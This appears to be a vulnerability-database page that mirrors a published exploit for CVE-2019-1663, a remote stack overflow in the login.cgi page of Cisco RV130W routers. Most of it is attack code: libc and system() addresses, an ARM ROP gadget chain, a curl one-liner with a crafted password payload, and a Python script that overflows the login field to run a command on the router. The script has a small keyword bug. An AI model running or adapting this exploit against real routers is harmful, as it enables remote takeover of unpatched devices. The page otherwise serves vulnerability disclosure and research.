Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Cisco RV130W 1.0.3.44 Remote Stack Overflow

🗓️ 04 Jun 2019 00:00:00Reported by 0x00stringType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 228 Views

Cisco RV130W versions 1.0.3.44 and prior vulnerable to remote stack overflow exploit.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Cisco RV130W Routers Management Interface Remote Command Execution Exploit
15 Apr 201900:00
zdt
0day.today		Cisco RV130W 1.0.3.44 - Remote Stack Overflow Exploit
4 Jun 201900:00
zdt
0day.today		Cisco RV110W / RV130(W) / RV215W Remote Command Execution Exploit
2 Sep 201900:00
zdt
GithubExploit		Exploit for CVE-2014-8361
31 Mar 202611:18
githubexploit
GithubExploit		Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Cisco Rv110W_Firmware
29 Nov 202517:54
githubexploit
GithubExploit		Exploit for Out-of-bounds Write in Cisco Rv110W_Firmware
2 Sep 202519:23
githubexploit
Circl		CVE-2019-1663
28 Feb 201915:31
circl
Cisco		Cisco RV110W, RV130W, and RV215W Routers Management Interface Remote Command Execution Vulnerability
27 Feb 201916:00
cisco
Tenable Nessus		Cisco RV110W, RV130W, and RV215W Routers Management Interface Remote Command Execution Vulnerability (cisco-sa-20190227-rmi-cmd-ex)
27 Feb 201900:00
nessus
CNVD		Cisco RV110W, RV130W, and RV215W Remote Command Execution Vulnerabilities
28 Feb 201900:00
cnvd
Rows per page
`#!/usr/bin/python  
# Exploit Title: Cisco RV130W Remote Stack Overflow  
# Google Dork: n/a  
# Date: Advisory Published: Feb 2019  
# Exploit Author: @0x00string  
# Vendor Homepage: cisco.com  
# Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html  
# Version: 1.0.3.44 and prior  
# Tested on: 1.0.3.44  
# CVE : CVE-2019-1663  
#  
# 0x357fc000 - libc base addr  
# 0x35849144 - system() addr  
#   
# 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr;  
# 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc};   
# 0x00041308 / 0x3583D308: mov r0, sp; blx r2;  
#   
# gadget 1 system() junk gadget 2 junk junk junk junk junk gadget 3 text  
# [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command]  
#  
# curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi'  
  
#!/usr/bin/python  
import requests  
  
def banner():  
print '''  
@0x00string  
0000000000000  
0000000000000000000 00  
00000000000000000000000000000  
0000000000000000000000000000000  
000000000 0000000000  
00000000 0000000000  
0000000 000000000000  
0000000 000000000000000  
000000 000000000 000000  
0000000 000000000 000000  
000000 000000000 000000  
000000 000000000 000000  
000000 00000000 000000  
000000 000000000 000000  
0000000 000000000 0000000  
000000 000000000 000000  
0000000000000000 0000000  
0000000000000 0000000  
00000000000 00000000  
00000000000 000000000  
0000000000000000000000000000000  
00000000000000000000000000000  
000 0000000000000000000  
0000000000000  
https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py  
'''  
  
def main():  
banner()  
command = "ping 192.168.1.100\x00"  
print ("Sending exploit to execute [" + command + "]\n")  
rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35"  
payload = ("Z" * 446) + rop + command  
url = "https://192.168.1.100:443/login.cgi"  
data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'}  
r = requests.post(url, payload=data)  
  
if __name__ == "__main__":  
main()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Jun 2019 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.87247
cisco rv130w exploit cve-2019-1663 remote stack overflow exploit code router security
228